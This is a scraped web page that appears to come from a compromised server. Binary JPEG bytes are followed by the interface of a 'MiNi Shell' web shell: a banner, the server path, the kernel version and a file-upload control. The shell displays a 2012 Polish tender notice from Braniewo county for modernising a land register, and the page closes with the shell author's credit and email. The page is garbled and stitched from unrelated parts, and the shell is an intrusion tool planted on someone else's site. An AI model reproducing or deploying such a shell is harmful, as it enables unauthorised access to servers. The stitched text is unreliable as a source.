JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/303402-N-2012.html

<p class="kh_header"><b>Braniewo: Postępowanie o udzielenie zamówienia publicznego dot. modernizacji ewidencji gruntów i budynków w zakresie działek ewidencyjnych, użytków gruntowych i klas gleboznawczych dla obrębu ewidencyjnego Krasnolipie 
z gminy Braniewo w powiecie braniewskim, w woj. warmińsko-mazurskim.</b><br>
<b>Numer ogłoszenia: 303402 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , Pl. Piłsudskiego 2, 14-500 Braniewo, woj. warmińsko-mazurskie, tel. 055 6440204, faks 055 6440205.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego dot. modernizacji ewidencji gruntów i budynków w zakresie działek ewidencyjnych, użytków gruntowych i klas gleboznawczych dla obrębu ewidencyjnego Krasnolipie 
z gminy Braniewo w powiecie braniewskim, w woj. warmińsko-mazurskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. CHARAKTERYSTYKA OBIEKTÓW.
       
1.PODSTAWOWE DANE O OBIEKTACH:
- nazwa obiektów: obręb ewidencyjny  -  Krasnolipie
- położenie obiektu: gmina Braniewo;
- powierzchnia : 885 ha;
- ilość działek: 240;
- ilość budynków ujawnionych aktualnie w ewidencji: 96 ; liczba lokali : 5:
- ilość jednostek rejestrowych gruntowych: 90.
2.POŁOŻENIE OBIEKTÓW:
Obręb Krasnolipie, składający się z miejscowości Krasnolipie i Grzędowo,  położony jest we wschodniej  części gminy Braniewo. Graniczy z obrębami Żelazna Góra, Krzewno i Wola Lipowska z  gm. Braniewo oraz obrębami Jachowo i Wyszkowo z gminy Lelkowo.
Powierzchnia gruntów będących w zarządzie Lasów Państwowych wynosi 55 ha tj.  ok. 6%.

II. PRZEWIDYWANY TERMIN WYKONANIA PRAC.
Całość prac zostanie wykonana w terminie do 15.12.2012 r.

III. OCENA STANU DOTYCHCZASOWEJ EWIDENCJI.
Operat ewidencji gruntów obrębu Krasnolipie założony został na podstawie pomiaru wsi Krasnolipie w 1956r. Po przeprowadzeniu scalenia gruntów w 1968r. dokonano aktualizacji ewidencji gruntów. Gleboznawczą klasyfikację gruntów przeprowadzono w 1960r. W 1999r. dokonano przetworzenia mapy analogowej na mapę numeryczną przy wykorzystaniu zgromadzonych w zasobie operatów jednostkowych oraz wektoryzacji rastra.W 2000 roku została założona ewidencja budynków i lokali. Na obszarze projektowanej modernizacji operatu ewidencji gruntów i budynków znajduje się osnowa III klasy założona w latach 1983 - 1985 oraz dwa punkty osnowy II klasy nr 212135000 i 212210200. Wszystkie punkty osnowy posiadają współrzędne w układzie 1965 i w układzie 2000. Osnowę pomiarową założono w latach 1966 - 1967 przy pomiarze Nadleśnictwa Regity. W 1998 roku została ona dowiązana do osnowy III klasy i ponownie wyrównana. Przeliczenia punktów osnowy pomiarowej na układ 2000 wykonano w 2004 roku.
Obręb Krasnolipie jest podzielony na 4 arkusze mapy ewidencji gruntów i budynków w skali 1:5000, która prowadzona jest w programie Microstation 95 oraz Nobel 3.5. Część opisowa prowadzona jest w systemie EGB V Win. Obszar zabudowany pokryty jest numeryczną mapą sytuacyjno - wysokościową w skali 1:1000. Wszystkie współrzędne osnów oraz istniejące współrzędne punktów granicznych posiadają współrzędne w układzie 2000 strefa 7.
Mapa numeryczna ewidencji gruntów i budynków aktualizowana jest na bieżąco w oparciu o dane pozyskiwane z pomiarów bezpośrednich.

IV.  PRZEWIDYWANY DO WYKONANIA ZAKRES PRAC.
1.Prace związane z modernizacją ewidencji gruntów i budynków dla obrębu ewidencyjnego Krasnolipie, polegają na uporządkowaniu, weryfikacji oraz dostosowaniu danych do wymogów Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia  29 marca 2001 r. w sprawie ewidencji gruntów i budynków.
2.Modernizacja przeprowadzona zostanie  zgodnie z zasadami określonymi w art.24a ustawy z dnia  17 maja 1989r. Prawo geodezyjne i kartograficzne /Dz. U. z 2010r.Nr 193, poz. 1087 t.j. z późn. zmianami/, § 55-57 rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia  29 marca 2001 r. w sprawie ewidencji gruntów i budynków  / Dz.U.Nr 38 poz.454 / oraz instrukcji technicznej G-5 z 2003r.
3.Podstawowy zakres prac geodezyjnych obejmujących  pozyskanie i opracowanie   
danych dotyczących  działek ewidencyjnych, użytków gruntowych i klas gleboznawczych:
- wznowienie punktów istniejącej osnowy pomiarowej, na które dane pomiarowe  
 znajdują się w PODGiK w Braniewie oraz założenie brakującej osnowy pomiarowej  
 niezbędnej do dokonania pomiarów w oparciu o osnowę podstawową i  
 szczegółową;
 - dokonanie trwałej stabilizacji punktów osnowy pomiarowej wznowionej i nowo  
 założonej oraz sporządzenie opisów topograficznych; 
 - uzgodnienie przebiegu granic zewnętrznych z obrębami sąsiednimi poprzez wznowienie znaków granicznych w trybie art.39 ustawy Prawo geodezyjne i kartograficzne. Wznowione punkty graniczne zastabilizować trwale.
 - dokonanie analizy materiałów geodezyjnych i kartograficznych przyjętych do      
państwowego zasobu geodezyjnego i kartograficznego dotyczących granic działek. Istniejące w zasobie współrzędne punktów granicznych w państwowym układzie współrzędnych 2000 przyjąć do dalszych opracowań w tym dane dotyczące Lasów Państwowych. Numerację punktów granicznych uzgodnić z Ośrodkiem Dokumentacji;
-sporządzenie raportów odzwierciedlających czynności wykonane w myśl rozdziału 9 Instrukcji technicznej G-5 Ewidencja gruntów i budynków;
- w przypadku braku materiałów geodezyjnych i kartograficznych niezbędnych do obliczenia współrzędnych punktów granicznych dokonanie ustalenia granic działek w trybie określonym w  §  38 rozporządzenia w sprawie ewidencji gruntów i budynków;
 - dokonanie badania ksiąg wieczystych dla wszystkich nieruchomości - dział I i II księgi wieczystej;          
- porównanie wszystkich nowo obliczonych powierzchni działek z odpowiadającymi im danymi zawartymi w operacie ewidencji gruntów i księgach wieczystych, w przypadku stwierdzenia różnic sporządzić niezbędną dokumentację do uzgodnienia zapisów w księgach wieczystych:
- w przypadku ujawnienia w księgach wieczystych numeracji działek niezgodnych z operatem ewidencji gruntów i budynków wykonanie wykazu synchronizacyjnego numerów działek i powierzchni oraz wyciągów z wykazu zmian danych ewidencyjnych dla dokonania wpisu do ksiąg wieczystych;
- przed ogłoszeniem stanu posiadania sporządzenie protokołu zawierającego dane dotyczące podmiotów władania: imię i nazwisko właściciela, użytkownika i dzierżawcy, imiona rodziców, aktualny adres, PESEL oraz dane dotyczące działek: powierzchni dotychczasowej przed modernizacją i powierzchni otrzymanej w wyniku modernizacji;
- zmiany w powierzchni działek, na które zainteresowani podczas wyłożenia projektu nie  wyrazili zgody, należy sprawdzić i ponownie zamierzyć w terenie z udziałem stron (zawiadomienie za zwrotnym potwierdzeniem odbioru), z pomiaru sporządzić protokół oraz szkic sytuacyjny uwzględniający stanowiska stron potwierdzone podpisem;
- sporządzenie zestawienia zawierającego powierzchnię działek wykazanych w operacie ewidencji gruntów z powierzchnią nowo obliczoną oraz ich różnice;
- porównanie mapy ewidencji gruntów pod względem użytków gruntowych (zgodnie z  §  67 i 68 rozporządzenia w sprawie ewidencji gruntów). W przypadku rozbieżności sporządzić dokumentację geodezyjną, którą wraz z operatem klasyfikacyjnym przedłożyć Staroście w celu podjęcia stosownej decyzji (decyzja zatwierdzająca zmiany klasyfikacji musi być ostateczna przed datą wyłożenia projektu opisowo-kartograficznego)
- koszty postępowania w zakresie klasyfikacji gruntów oraz koszt sprawdzenia klasyfikacji wchodzą w skład ceny wykonania roboty;
- w przypadku, gdy zasięg konturów użytków gruntowych ujawnionych w operacie ewidencji gruntów jest zgodny z terenem, dane w tym zakresie oraz zasięg konturów gleboznawczej klasyfikacji gruntów przyjąć z dotychczasowej mapy ewidencji gruntów. Grunty rolne i leśne wyłączone z produkcji rolnej i leśnej oraz grunty zabudowane przeznaczone na cele nierolnicze oznaczyć zgodnie z postanowieniem  §  68 rozporządzenia w sprawie ewidencji gruntów i budynków;
- wszystkie współrzędne powstałe z modernizacji operatu ewidencji gruntów  należy  opracować w układzie 2000 strefa 7;
- sporządzić odpowiednią dokumentację końcową.
4. Ponadto przeprowadzona zostanie :
 - korekta nazwisk właścicieli i władających ich imion i imion rodziców oraz 
   uzupełnienie brakujących identyfikatorów PESEL,
- aktualizacja bazy adresowej podmiotów ewidencyjnych,
- do bazy części opisowej ewidencji gruntów aktualizacja  informacji o użytkach  
  ekologicznych, o wpisaniu nieruchomości do rejestru zabytków oraz dane  
  dotyczące numerów rejonów statystycznych i obwodów spisowych.
Szczegóły przedmiotowego opracowania zostaną określone w warunkach technicznych.

V. ZAKRES I SPOSÓB WYKORZYSTANIA ISTNIEJĄCYCH MATERIAŁÓW GEODEZYJNYCH ORAZ DANYCH DOTYCZĄCYCH PODMIOTÓW EWIDENCYJNYCH. 
   1. Do wykorzystania w całości przewiduje się :
- numeryczną mapę ewidencji gruntów i budynków  skala 1:5000,
- numeryczną mapę zasadniczą skala 1:1000,
- operat ewidencji gruntów - część opisowa,
- operaty techniczne dotyczące w/w obrębów ewidencyjnych,
- dane zawarte w księgach wieczystych urządzonych dla nieruchomości objętych  
   opracowaniem,
- dane zawarte w dokumentach udostępnionych przez zainteresowane strony, organy
  i jednostki organizacyjne, 
- dane uzyskane w wyniku oględzin

2. Istniejące bazy danych w formacie opracowania NOBEL 3.5 oraz Microstation 95.

3.Opisowe dane ewidencyjne z dotychczasowej bazy ewidencji gruntów prowadzonej 
w systemie EGB V WIN w. 6.20.

VI. PRZEWIDYWANY ZAKRES PRAC OBLICZENIOWYCH, KARTOGRAFICZNYCH, INFORMATYCZNYCH I DOKUMENTACYJNYCH. 

1. Wykonanie  projektu operatu  opisowo - kartograficznego.
2. Wyłożenie  projektu operatu  opisowo - kartograficznego do wglądu osób zainteresowanych na  
okres 15 dni roboczych .
3. Opracowanie protokołu wyłożenia projektu operatu  opisowo - kartograficznego oraz  rozstrzygniecie o przyjęciu lub odrzuceniu uwag .
4.  Skompletowanie operatu technicznego  z przeznaczeniem do PODGiK w Braniewie.
5. Uzupełnienie numerycznej mapy ewidencyjnej /w programie NOBEL 3.5 i Microstation  oraz części opisowej ewidencji gruntów i budynków / w programie EGBV wer 6.20 /.
6. Sporządzenie wydruków z mapy numerycznej w/g stanu na dzień wyłożenia projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymogów art. 22 ustawy z dn. 29.01.2004r.- Prawo zamówień publicznych - złożone na Załączniku nr 2 do SIWZ - Formularzu ofertowym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymogów art. 22 ustawy z dn. 29.01.2004r.- Prawo zamówień publicznych - złożone na Załączniku nr 2 do SIWZ - Formularzu ofertowym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymogów art. 22 ustawy z dn. 29.01.2004r.- Prawo zamówień publicznych - złożone na Załączniku nr 2 do SIWZ - Formularzu ofertowym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymogów art. 22 ustawy z dn. 29.01.2004r.- Prawo zamówień publicznych - złożone na Załączniku nr 2 do SIWZ - Formularzu ofertowym.
na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia należy przedstawić wykaz osób (min. 3) przewidzianych do realizacji zamówienia  posiadających uprawnienia geodezyjne w zakresie 1 i 2 oraz min. 1 osoby posiadającej uprawnienia do gleboznawczej klasyfikacji gruntów. Kserokopię uprawnień potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymogów art. 22 ustawy z dn. 29.01.2004r.- Prawo zamówień publicznych - złożone na Załączniku nr 2 do SIWZ - Formularzu ofertowym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Złożenie oferty cenowej z ceną brutto na formularzu stanowiącym zał nr 2 SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-braniewo.pl, bip.powiat-braniewo.p<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Braniewie, Pl. Piłsudskiego 2, 14-500 Braniewo, pok. 411.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Braniewie, Pl. Piłsudskiego 2, 14-500 Braniewo, pok. nr 213 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com